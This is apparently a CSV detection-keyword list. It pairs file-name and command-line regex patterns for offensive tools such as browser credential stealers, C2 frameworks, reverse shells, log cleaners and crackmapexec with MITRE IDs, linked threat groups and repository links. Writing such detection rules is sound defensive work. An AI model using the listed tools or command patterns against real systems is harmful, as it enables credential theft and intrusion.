"*\chisel_x64*",".{0,1000}\\chisel_x64.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","14507"
"*\chisel-master*",".{0,1000}\\chisel\-master.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","14508"
"*\chntpw.c*",".{0,1000}\\chntpw\.c.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14509"
"*\chntpw-140201*",".{0,1000}\\chntpw\-140201.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14510"
"*\chrome_creditcard.csv*",".{0,1000}\\chrome_creditcard\.csv.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","14512"
"*\chrome_creditcard.json*",".{0,1000}\\chrome_creditcard\.json.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","14513"
"*\chrome_decrypt.cpp*",".{0,1000}\\chrome_decrypt\.cpp.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","N/A","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","14514"
"*\chrome_decrypt.exe*",".{0,1000}\\chrome_decrypt\.exe.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","N/A","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","14515"
"*\Chrome_pass.db*",".{0,1000}\\Chrome_pass\.db.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","14516"
"*\chrome_password.csv*",".{0,1000}\\chrome_password\.csv.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","14517"
"*\chrome_password.json*",".{0,1000}\\chrome_password\.json.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","14518"
"*\ChromeDump.ahk*",".{0,1000}\\ChromeDump\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","14520"
"*\ChromeKatz.sln*",".{0,1000}\\ChromeKatz\.sln.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","14521"
"*\chromepasswordlist.csv*",".{0,1000}\\chromepasswordlist\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","14522"
"*\chromepasswords.py*",".{0,1000}\\chromepasswords\.py.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","14523"
"*\ChromeStealer.cpp*",".{0,1000}\\ChromeStealer\.cpp.{0,1000}","offensive_tool_keyword","ChromeStealer","extract and decrypt stored passwords from Google Chrome","T1555.003 - T1003.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/BernKing/ChromeStealer","1","0","N/A","N/A","8","2","145","18","2024-07-25T08:27:10Z","2024-07-14T13:27:30Z","14524"
"*\ChromeStealer.sln*",".{0,1000}\\ChromeStealer\.sln.{0,1000}","offensive_tool_keyword","ChromeStealer","extract and decrypt stored passwords from Google Chrome","T1555.003 - T1003.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/BernKing/ChromeStealer","1","0","N/A","N/A","8","2","145","18","2024-07-25T08:27:10Z","2024-07-14T13:27:30Z","14525"
"*\ChromeStealer-main*",".{0,1000}\\ChromeStealer\-main.{0,1000}","offensive_tool_keyword","ChromeStealer","extract and decrypt stored passwords from Google Chrome","T1555.003 - T1003.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/BernKing/ChromeStealer","1","0","N/A","N/A","8","2","145","18","2024-07-25T08:27:10Z","2024-07-14T13:27:30Z","14526"
"*\chromium\getCredschromium.h*",".{0,1000}\\chromium\\getCredschromium\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","14527"
"*\chromium_based_browsers.py*",".{0,1000}\\chromium_based_browsers\.py.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","14528"
"*\ChromiumDecryptor.cpp*",".{0,1000}\\ChromiumDecryptor\.cpp.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","14529"
"*\CIMplant.exe*",".{0,1000}\\CIMplant\.exe.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","0","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","14530"
"*\cleanRDP.bat*",".{0,1000}\\cleanRDP\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","CleanRDP.bat script erasing RDP traces used by Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14533"
"*\cleantracks.ps1",".{0,1000}\\cleantracks\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14534"
"*\CleanTracks.ps1*",".{0,1000}\\CleanTracks\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14535"
"*\clear_logs.py*",".{0,1000}\\clear_logs\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","14536"
"*\ClearnEventRecordID.ps1*",".{0,1000}\\ClearnEventRecordID\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14537"
"*\ClearnIpAddress.ps1*",".{0,1000}\\ClearnIpAddress\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14538"
"*\ClearnTempLog.ps1*",".{0,1000}\\ClearnTempLog\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14539"
"*\clfs_eop.cpp*",".{0,1000}\\clfs_eop\.cpp.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","14540"
"*\clfs_eop.exe*",".{0,1000}\\clfs_eop\.exe.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","0","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","14541"
"*\ClickJack.csproj*",".{0,1000}\\ClickJack\.csproj.{0,1000}","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","14542"
"*\ClickJack.exe",".{0,1000}\\ClickJack\.exe","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","14543"
"*\clipboard.ps1*",".{0,1000}\\clipboard\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14544"
"*\Clipboard.ps1*",".{0,1000}\\Clipboard\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14545"
"*\ClipboardMITM.py*",".{0,1000}\\ClipboardMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","14546"
"*\cliws.exe*",".{0,1000}\\cliws\.exe.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","N/A","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","14547"
"*\CloakNDaggerC2*",".{0,1000}\\CloakNDaggerC2.{0,1000}","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","0","N/A","N/A","10","10","17","3","2024-10-09T15:36:46Z","2023-04-28T01:58:18Z","14548"
"*\clop1.txt*",".{0,1000}\\clop1\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14549"
"*\clop2.txt*",".{0,1000}\\clop2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14550"
"*\cloud_enum.py*",".{0,1000}\\cloud_enum\.py.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","N/A","6","10","1794","271","2024-10-10T08:16:59Z","2019-05-31T09:14:05Z","14551"
"*\CLR-Injection_x64.bat*",".{0,1000}\\CLR\-Injection_x64\.bat.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","0","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","14558"
"*\CLR-Injection_x86.bat*",".{0,1000}\\CLR\-Injection_x86\.bat.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","0","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","14559"
"*\CLR-Injection-main*",".{0,1000}\\CLR\-Injection\-main.{0,1000}","offensive_tool_keyword","CLR-Injection","Use CLR to inject all the .NET apps","T1055.009","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/3gstudent/CLR-Injection","1","0","N/A","N/A","8","2","183","45","2021-04-17T01:39:32Z","2017-07-27T03:00:04Z","14560"
"*\cmd_payload_x64.exe*",".{0,1000}\\cmd_payload_x64\.exe.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14562"
"*\cmd_payload_x86.exe*",".{0,1000}\\cmd_payload_x86\.exe.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14563"
"*\cme.exe* -d * -u * -H *",".{0,1000}\\cme\.exe.{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-H\s.{0,1000}","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","14565"
"*\cme.exe* -d * -u * -p *",".{0,1000}\\cme\.exe.{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","14566"
"*\cme.exe* --shares*",".{0,1000}\\cme\.exe.{0,1000}\s\-\-shares.{0,1000}","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","14567"
"*\CMLoot.ps1*",".{0,1000}\\CMLoot\.ps1.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","0","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","14568"
"*\cmstp_uac.ahk*",".{0,1000}\\cmstp_uac\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","14569"
"*\cobaltProtectMyTooling.conf*",".{0,1000}\\cobaltProtectMyTooling\.conf.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","14570"
"*\code_exec.ps1*",".{0,1000}\\code_exec\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","14571"
"*\codeloader.exe*",".{0,1000}\\codeloader\.exe.{0,1000}","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","0","N/A","N/A","10","10","656","121","2025-02-18T14:31:45Z","2021-01-19T15:57:01Z","14572"
"*\CoercedPotato.cpp*",".{0,1000}\\CoercedPotato\.cpp.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","14573"
